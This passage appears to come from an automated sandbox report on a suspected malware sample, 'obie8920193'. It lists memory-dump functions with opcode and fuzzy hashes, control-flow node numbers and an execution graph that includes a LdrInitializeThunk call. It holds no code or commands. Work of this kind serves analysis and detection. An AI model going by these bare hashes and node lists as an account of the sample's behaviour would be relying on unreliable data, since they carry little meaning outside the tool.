                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8+k
                      • API String ID: 0-2032740483
                      • Opcode ID: f0ab5201659bce72ad43734ea7a9699673c958a894fc3bcfe08be6a29f156b11
                      • Instruction ID: 377694c87564085033e7c476c4dcc3fc6ad10c0ca4183df0c9e16c9652fd052d
                      • Opcode Fuzzy Hash: f0ab5201659bce72ad43734ea7a9699673c958a894fc3bcfe08be6a29f156b11
                      • Instruction Fuzzy Hash: 28E1FB74E102598FCB14DFA9D580AADFBF2BF89304F258169D814AB356D7319D82CF60
                      Function 0026E798 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: )k
                      • API String ID: 0-3758044612
                      • Opcode ID: 543f4f22a73938df02b2598bbd97526dd38ddea4f0a8b6e8e9d1b9ff6d085091
                      • Instruction ID: e261e231a9b8f64f3b942b6407c440e03063dc6c51e35362e127668057c659af
                      • Opcode Fuzzy Hash: 543f4f22a73938df02b2598bbd97526dd38ddea4f0a8b6e8e9d1b9ff6d085091
                      • Instruction Fuzzy Hash: 77511C74E102598FDB14CFA9D5805AEFBF2BF89304F25816AD818A7256D7309941CFA0
                      Function 0026F0C8 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4cadc1859dceffd3a37a09ce15a976d579568a1cf8538eb7607197bcbfd3b87
                      • Instruction ID: a19530c61071a60c92bd110ce97ffd88a05e677272b5176f12f461ccbf12ec76
                      • Opcode Fuzzy Hash: f4cadc1859dceffd3a37a09ce15a976d579568a1cf8538eb7607197bcbfd3b87
                      • Instruction Fuzzy Hash: 49E10C74E102598FCB54DFA9D580AAEFBB2FF89304F248169D814A7356D730AD81CFA0
                      Function 0026E7A8 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32dc0c863fbe3a8c3175ab4d48fe412618d1efce8a73f86d918d9b3e5890029e
                      • Instruction ID: 126467bb4595cf2266b0c162dcdd7eebac78a442a7ab7cb816c49641d9cc3626
                      • Opcode Fuzzy Hash: 32dc0c863fbe3a8c3175ab4d48fe412618d1efce8a73f86d918d9b3e5890029e
                      • Instruction Fuzzy Hash: A1E10B74E101598FCB14DFA9D580AADFBB2FF89304F258169D815AB356D730AD82CFA0
                      Function 0026FA70 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3a448483b93b483b1a6c68432b0ca049c1fc6fcea3b2e81632fd8b95a43c5955
                      • Instruction ID: 5e647d5d226a7f5f53a56d4d949688d75910b4e7eeea4881c50f74feee56bcfb
                      • Opcode Fuzzy Hash: 3a448483b93b483b1a6c68432b0ca049c1fc6fcea3b2e81632fd8b95a43c5955
                      • Instruction Fuzzy Hash: 21E10C74E102598FCB54DFA9D580AADFBB2FF89304F248169D814AB356D731AD82CF60
                      Function 0026FA60 Relevance: .2, Instructions: 160COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab35c43226fa658dac135a0f5b3a07e95cc0bac89d1730311ea5385cc3b9a7cf
                      • Instruction ID: f4985f30392a72be414af97310b839fa639ed9e26dda6976e86db741b2ecaec9
                      • Opcode Fuzzy Hash: ab35c43226fa658dac135a0f5b3a07e95cc0bac89d1730311ea5385cc3b9a7cf
                      • Instruction Fuzzy Hash: 3461F774E102198FCF14CFA9D5809AEFBF2BF89314F24816AD818AB316D7319941CF60
                      Function 001C230D Relevance: .0, Instructions: 29COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a1a59aaa5b7bd0955ff8fbf4c53a3adfc74e94d765a0cbfcff6d158d287f9597
                      • Instruction ID: faf2c6d48b0e56deb77c2d37c5328d83713d81b55773a126496e7277f3232bbb
                      • Opcode Fuzzy Hash: a1a59aaa5b7bd0955ff8fbf4c53a3adfc74e94d765a0cbfcff6d158d287f9597
                      • Instruction Fuzzy Hash: 36E0923494A154DFCB14DF94E844BF8B7BCF76A311F1560AAD50EA3261DB309A89EF10

                      Execution Graph

                      Execution Coverage:13%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:28.6%
                      Total number of Nodes:14
                      Total number of Limit Nodes:0
                      execution_graph 11719 3c4720 11720 3c472c 11719->11720 11723 3c78c1 11720->11723 11721 3c47e0 11725 3c78f2 11723->11725 11724 3c7cd9 11724->11721 11725->11724 11728 3cfcb8 11725->11728 11732 3cfe53 11725->11732 11729 3cfcdf 11728->11729 11730 3cfe0a LdrInitializeThunk 11729->11730 11731 3cfdfb 11729->11731 11730->11731 11731->11725 11735 3cfd17 11732->11735 11733 3cfe0a LdrInitializeThunk 11734 3cfdfb 11733->11734 11734->11725 11735->11733 11735->11734

                      Executed Functions

                      Function 003CFCB8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2044 3cfcb8-3cfcdd 2045 3cfcdf 2044->2045 2046 3cfce4-3cfd4b 2044->2046 2045->2046 2051 3cfdd5-3cfddb 2046->2051 2052 3cfd50-3cfd63 2051->2052 2053 3cfde1-3cfdf9 2051->2053 2054 3cfd6a-3cfda6 2052->2054 2055 3cfd65 2052->2055 2056 3cfe0a-3cfe2a LdrInitializeThunk 2053->2056 2057 3cfdfb-3cfe08 2053->2057 2066 3cfda8-3cfdb6 2054->2066 2067 3cfdb9-3cfdcb 2054->2067 2055->2054 2058 3cfe2c-3cff07 2056->2058 2057->2058 2061 3cff0f-3cff18 2058->2061 2062 3cff09-3cff0e 2058->2062 2062->2061 2066->2053 2070 3cfdcd 2067->2070 2071 3cfdd2 2067->2071 2070->2071 2071->2051
                      APIs
                      • LdrInitializeThunk.NTDLL(000000FF), ref: 003CFE1A
                      Memory Dump Source
                      • Source File: 00000007.00000002.864098799.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_3c0000_obie8920193.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: fc725fac89748b705ca636c0ecadf8e47819bd69309a664caf847808857bffcd
                      • Instruction ID: 5d42983b044c137bdd348a1790af5efb2e82893f38104628b332a68d1129b415
                      • Opcode Fuzzy Hash: fc725fac89748b705ca636c0ecadf8e47819bd69309a664caf847808857bffcd
                      • Instruction Fuzzy Hash: EC5112B4D01218CFDB18CFAAD488BDDBBB2BF88314F20C52AE415AB294D7749845CF50
                      Function 00575E58 Relevance: .7, Instructions: 745COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2109 575e58-575e78 2110 575e7f-575ef7 2109->2110 2111 575e7a 2109->2111 2115 575f44-575f96 2110->2115 2116 575ef9-575f3f 2110->2116 2111->2110 2123 575fdd-5760c1 2115->2123 2124 575f98-575fdc 2115->2124 2116->2123 2136 5760c7-5761c9 2123->2136 2137 576c76-576cab 2123->2137 2124->2123 2147 576c69-576c6f 2136->2147 2148 576c75 2147->2148 2149 5761ce-5762ab 2147->2149 2148->2137 2157 5762b2-57631a 2149->2157 2158 5762ad 2149->2158 2162 576321-576332 2157->2162 2163 57631c 2157->2163 2158->2157 2164 5763be-5764c4 2162->2164 2165 576338-576342 2162->2165 2163->2162 2183 5764c6 2164->2183 2184 5764cb-576533 2164->2184 2166 576344 2165->2166 2167 576349-5763bd 2165->2167 2166->2167 2167->2164 2183->2184 2188 576535 2184->2188 2189 57653a-57654b 2184->2189 2188->2189 2190 5765d7-57678a 2189->2190 2191 576551-57655b 2189->2191 2212 576791-57680e 2190->2212 2213 57678c 2190->2213 2192 576562-5765d6 2191->2192 2193 57655d 2191->2193 2192->2190 2193->2192 2217 576815-576826 2212->2217 2218 576810 2212->2218 2213->2212 2219 5768b2-57694b 2217->2219 2220 57682c-576836 2217->2220 2218->2217 2230 576952-5769c9 2219->2230 2231 57694d 2219->2231 2221 57683d-5768b1 2220->2221 2222 576838 2220->2222 2221->2219 2222->2221 2238 5769d0-5769e1 2230->2238 2239 5769cb 2230->2239 2231->2230 2240 5769e7-576a7b 2238->2240 2241 576ace-576b62 2238->2241 2239->2238 2255 576a82-576acd 2240->2255 2256 576a7d 2240->2256 2250 576c54-576c5f 2241->2250 2251 576b68-576c53 2241->2251 2253 576c66 2250->2253 2254 576c61 2250->2254 2251->2250 2253->2147 2254->2253 2255->2241 2256->2255
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 60104d8c51657e5aa4e21069014426b1dc12487e66c87dc61ca1da35075dd0c8
                      • Instruction ID: d81415765d5eb89986bc0494fbde8b4ecbc4183078d9f6bbc2fcc264b7dec8c8
                      • Opcode Fuzzy Hash: 60104d8c51657e5aa4e21069014426b1dc12487e66c87dc61ca1da35075dd0c8
                      • Instruction Fuzzy Hash: B9827E74E012688FDB64DF69DC98BDDBBB2AF89300F1481EA950DA7265DB315E81CF40
                      Function 0057F460 Relevance: .2, Instructions: 219COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fd2c181b8da4b83a856425a91e1f4a38323f09218190de012123acc4c58594c9
                      • Instruction ID: 20d727330a81ebf0a1e0abbddaf5f61ac32205adf155d2fe9e504ddcc4c50f94
                      • Opcode Fuzzy Hash: fd2c181b8da4b83a856425a91e1f4a38323f09218190de012123acc4c58594c9
                      • Instruction Fuzzy Hash: 14A19175E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF11
                      Function 0057EE10 Relevance: .2, Instructions: 219COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69e0767cd01c735a675977020a00c31f29fd7c3f43ffb1954bd0624ac62889a1
                      • Instruction ID: d8d4657af73bf5e853ce3f28150b130e985c1bb9610223d4c29dcae7f5d4c8fb
                      • Opcode Fuzzy Hash: 69e0767cd01c735a675977020a00c31f29fd7c3f43ffb1954bd0624ac62889a1
                      • Instruction Fuzzy Hash: FBA18075E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF11
                      Function 0057E7C0 Relevance: .2, Instructions: 219COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 61d051999cc6661a142bf1107e8ee5614ba447b21c81c3ed9387e9263d8baf95
                      • Instruction ID: 2ddccfdc35dcb40cff991f353d4ee27543346886514e4d6a9aec98cf8af7805a
                      • Opcode Fuzzy Hash: 61d051999cc6661a142bf1107e8ee5614ba447b21c81c3ed9387e9263d8baf95
                      • Instruction Fuzzy Hash: F8A19F75E012288FEB68CF6AD945B9DBBF2BB89300F14C0EAD40DA7255DB745A85CF10
                      Function 0057D4E0 Relevance: .2, Instructions: 219COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 71aca36ca3c9ab1762d38424a1fe21a3febe361c50e0a53e0e5183dd785ed673
                      • Instruction ID: e084f5ca026c042bbbd19c2e3df0f85ecb2ae3b229fe97c2a5e719804f088829
                      • Opcode Fuzzy Hash: 71aca36ca3c9ab1762d38424a1fe21a3febe361c50e0a53e0e5183dd785ed673
                      • Instruction Fuzzy Hash: C0A18374E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51
                      Function 00690040 Relevance: .2, Instructions: 219COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bba09446fbd579408acffd9a92ffca3cec0f9bb096fc88cbc9d81f4203dd05fa
                      • Instruction ID: b0f0e38c2344f1819fb8bc3c469f62f28a74a28b63a929c30d149eaff746840b
                      • Opcode Fuzzy Hash: bba09446fbd579408acffd9a92ffca3cec0f9bb096fc88cbc9d81f4203dd05fa
                      • Instruction Fuzzy Hash: 6FA19274E01228CFEB68CF6AD944B9DBBF6AF89300F14C1AAD40DA7255DB345A85CF11
                      Function 00690CD8 Relevance: .2, Instructions: 219COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26bfaaf6814ef7e04e9b4f96932328c399835da5278abe7726898d77555414a0
                      • Instruction ID: e1a16897b14f22a50849568bd1741bc02d12661ba5478e405022c060a9ce8f22
                      • Opcode Fuzzy Hash: 26bfaaf6814ef7e04e9b4f96932328c399835da5278abe7726898d77555414a0
                      • Instruction Fuzzy Hash: B3A19374E012288FEB68CF6AD944BDDBBF6AF89300F14C0AAD50DA7255DB345A85CF11
                      Function 0057E178 Relevance: .2, Instructions: 218COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 11199036ba2eb85b313357dc577b6e732ae6410f9f2742939def0df8893a3bb3
                      • Instruction ID: ba13d5ab2a5cde04621d7df226bcc169faa6e500b7d7b576ac9089c1822b27ec
                      • Opcode Fuzzy Hash: 11199036ba2eb85b313357dc577b6e732ae6410f9f2742939def0df8893a3bb3
                      • Instruction Fuzzy Hash: 1CA17074E012288FEB68CF6AD945B9DBBF2BB89300F14C4AAD40DA7255DB345A85CF11
                      Function 0057DB30 Relevance: .2, Instructions: 218COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: efc051eb8cb112d0cc42c776d153f3f0e68b709c642159f7b171858973ad206f
                      • Instruction ID: 21df63909ec7113202826d7782fe0f11a0e020f7b582c0060e5bff2471c9a927
                      • Opcode Fuzzy Hash: efc051eb8cb112d0cc42c776d153f3f0e68b709c642159f7b171858973ad206f
                      • Instruction Fuzzy Hash: 2BA18175E012288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51
                      Function 00690690 Relevance: .2, Instructions: 218COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 112b66137c519f1ed77983d0d93d21809f5b76c698893c2519e2265c8718897e
                      • Instruction ID: 51c3bd93b03984c68db497c00c3a9f92a64dbea8eac7d3896abecaf92e0d2812
                      • Opcode Fuzzy Hash: 112b66137c519f1ed77983d0d93d21809f5b76c698893c2519e2265c8718897e
                      • Instruction Fuzzy Hash: 8EA19174E01228CFEB68CF6AD944BDDBBF2AF89300F14C0AAD409A7255DB345A85CF50
                      Function 00690006 Relevance: .1, Instructions: 122COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864470478.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_690000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0c5fe8e0eca9d1dce1a01f602de49c53a97d28f9c90b263f440f86f53e659e0
                      • Instruction ID: f40f92ba85b7204dc1d4bfab1e84cf2c03e1e1be75f0ebea9907991f755f4700
                      • Opcode Fuzzy Hash: e0c5fe8e0eca9d1dce1a01f602de49c53a97d28f9c90b263f440f86f53e659e0
                      • Instruction Fuzzy Hash: FF51A571E056588FEB59CF6AD9557D9BBF3AFC9200F04C0AAC44CAA265DB340A86CF11
                      Function 003CFE53 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2072 3cfe53-3cfe5d 2073 3cfe5f-3cfe67 2072->2073 2074 3cfe69-3cfe6c 2072->2074 2075 3cfe6f-3cfe75 2073->2075 2074->2075 2076 3cfe7e-3cfe7f 2075->2076 2077 3cfe77 2075->2077 2079 3cfeee-3cfefb 2076->2079 2077->2076 2078 3cfe32-3cfe44 2077->2078 2080 3cfe4d-3cfe4e 2078->2080 2081 3cfe46 2078->2081 2101 3cff03-3cff07 2079->2101 2080->2079 2081->2076 2081->2078 2081->2080 2082 3cfdb8 2081->2082 2083 3cfdba-3cfdcb 2081->2083 2084 3cfdfb-3cfe08 2081->2084 2085 3cfdb5-3cfdb6 2081->2085 2086 3cfd17-3cfd1d 2081->2086 2087 3cfd50-3cfd63 2081->2087 2088 3cfd32-3cfd4b 2081->2088 2089 3cfe2c-3cfe2d 2081->2089 2090 3cfda8-3cfdb2 2081->2090 2091 3cfe0a-3cfe2a LdrInitializeThunk 2081->2091 2092 3cfd24-3cfd2b 2081->2092 2093 3cfde1-3cfdf9 2081->2093 2098 3cfdb9 2082->2098 2099 3cfdcd 2083->2099 2100 3cfdd2 2083->2100 2084->2089 2085->2093 2086->2092 2096 3cfd6a-3cfda6 2087->2096 2097 3cfd65 2087->2097 2095 3cfdd5-3cfddb 2088->2095 2089->2101 2090->2085 2091->2089 2092->2088 2093->2084 2093->2091 2095->2087 2095->2093 2096->2090 2096->2098 2097->2096 2098->2083 2099->2100 2100->2095 2103 3cff0f-3cff18 2101->2103 2104 3cff09-3cff0e 2101->2104 2104->2103
                      Memory Dump Source
                      • Source File: 00000007.00000002.864098799.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_3c0000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e007139dc278ae8036ac28f0ba761be8ce25846e1de8e99f9e61985af786c437
                      • Instruction ID: f8ed795f5d2e18ab8d0152601e8c6506a5f2a996caad4b4aee1c822707efb4cc
                      • Opcode Fuzzy Hash: e007139dc278ae8036ac28f0ba761be8ce25846e1de8e99f9e61985af786c437
                      • Instruction Fuzzy Hash: F151EFB4D01208CFCB15CFA9D488BECBBB6FF49325F209529E016AB295D7749885CF14
                      Function 0057CF30 Relevance: .1, Instructions: 111COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7f2e68136ac94458403e59e35ba9fff324d83bd9f01289871189e1dc7db4bb8
                      • Instruction ID: a60718c817df8897f07800e8c0c2c9f78170629bee41a9baac648a777384919f
                      • Opcode Fuzzy Hash: d7f2e68136ac94458403e59e35ba9fff324d83bd9f01289871189e1dc7db4bb8
                      • Instruction Fuzzy Hash: B141A174E01218CFDB54DFA9E598BEDBBF2BF49300F20912AD809A7294DB345A46CF54
                      Function 001FD044 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864004992.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1fd000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 36beff617af57bd7014613533ce210f433b6f5de1f90a58dcafabc589b295174
                      • Instruction ID: 0d1e960966b2971c89c3cd62f1c01534a9b3f5efb8c3aee987772c787a67ade1
                      • Opcode Fuzzy Hash: 36beff617af57bd7014613533ce210f433b6f5de1f90a58dcafabc589b295174
                      • Instruction Fuzzy Hash: 0721F2B1604248AFDB15CF24E8C4B36BB66EB84314F34C5A9E9494B246CB36D847CB61
                      Function 001FD03F Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864004992.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1fd000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction ID: 3e3f7a4bf50355bf73bcfffc23bd96d5bf4b0209aacd46b2b5d84e4bb4fe8715
                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction Fuzzy Hash: 9311D075504244CFDB12CF10D9C4B25BF62FB44314F24C6ADE9494B256C33AD84ACF61
                      Function 001FD006 Relevance: .0, Instructions: 49COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.864004992.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1fd000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7306a6c0cd1ab2d411fbb8dfcf63e7e607d0d3b8f8d84c8ff3035794112c797
                      • Instruction ID: 7eb935f2ec658674873c0bea5f78148d82fc6543460d10d6aaf0704ff4c0864a
                      • Opcode Fuzzy Hash: d7306a6c0cd1ab2d411fbb8dfcf63e7e607d0d3b8f8d84c8ff3035794112c797
                      • Instruction Fuzzy Hash: C511D37140E3C48FD7078B7099A42267F709F43214F1A85EBC5C5CF1A3C26A880AC763

                      Non-executed Functions

                      Function 00576CC8 Relevance: 11.7, Strings: 9, Instructions: 461COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                      • API String ID: 0-3547488823
                      • Opcode ID: 2e8171b0b891612dca8656084d32e6e787263d2847c5d0d27b420c21f481ed3b
                      • Instruction ID: f356e8e1acf9689be1dda0f317056c743c8c524290f3739e32d8d99529b1e7e7
                      • Opcode Fuzzy Hash: 2e8171b0b891612dca8656084d32e6e787263d2847c5d0d27b420c21f481ed3b
                      • Instruction Fuzzy Hash: E2328074E01218CFDB68DF65D988B9DBBB2BF89300F2084A9D409AB355DB719E85DF10
                      Function 00576CBC Relevance: 11.6, Strings: 9, Instructions: 366COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.864405088.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_570000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                      • API String ID: 0-3547488823
                      • Opcode ID: b3e7840b7d977e95a86ae57b777ae87fb917f2f2b570d2257887ec386b5da6c3
                      • Instruction ID: c73c2ce2b8b6a4153e8fb6c832125593db1646d0a57805688d5c18d8ab00d680
                      • Opcode Fuzzy Hash: b3e7840b7d977e95a86ae57b777ae87fb917f2f2b570d2257887ec386b5da6c3
                      • Instruction Fuzzy Hash: 2002C0B4E012188FDB58DF65D988B9DBBB2BF89300F2085A9D809A7355DB719E85CF10